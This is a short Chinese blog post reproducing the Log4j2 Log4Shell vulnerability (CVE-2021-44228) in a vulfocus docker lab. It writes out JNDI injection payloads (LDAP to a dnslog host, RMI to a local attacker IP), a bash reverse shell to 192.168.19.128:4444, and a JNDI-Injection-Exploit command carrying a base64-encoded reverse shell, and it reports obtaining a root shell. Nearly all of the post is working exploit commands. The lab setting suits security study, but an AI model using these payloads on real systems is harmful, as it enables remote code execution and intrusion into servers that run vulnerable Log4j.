2021-log4j2漏洞复现CVE-2021-44228-反弹shell

2021-log4j2漏洞复现CVE-2021-44228

20211215

12:03

   

该漏洞是最近新爆出的漏洞能够远程执行 命令:

该镜像本地可以搭建环境:

1、拉取一个docker镜像 docker pull vulfocus/log4j2-rce-2021-12-09

2、跑起来docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09

 

使用vulfocus可以搭建好环境:

访问该链接:

http://vulfocus.fofa.so:42044/hello

之后POST传入以下payload:

payload=${jndi:ldap://wdhcrj.dnslog.cn/exp}

回显回来了内容dnslog:

本地搭建环境,将镜像拉下来搭建好环境:

之后准备payload:

bash -i >& /dev/tcp/192.168.19.128/4444 0>&1

在kali/2021文件夹种有这个工具生成payload:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5LjEyOC80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.19.128"

尝试使用第一个payload:

payload=${jndi:rmi://192.168.19.128:1099/uctfqw}

再开一个终端可以回弹shell,有root权限:

  

posted @ 2021-12-15 13:30  逆向菜狗  阅读(3283)  评论(0编辑  收藏  举报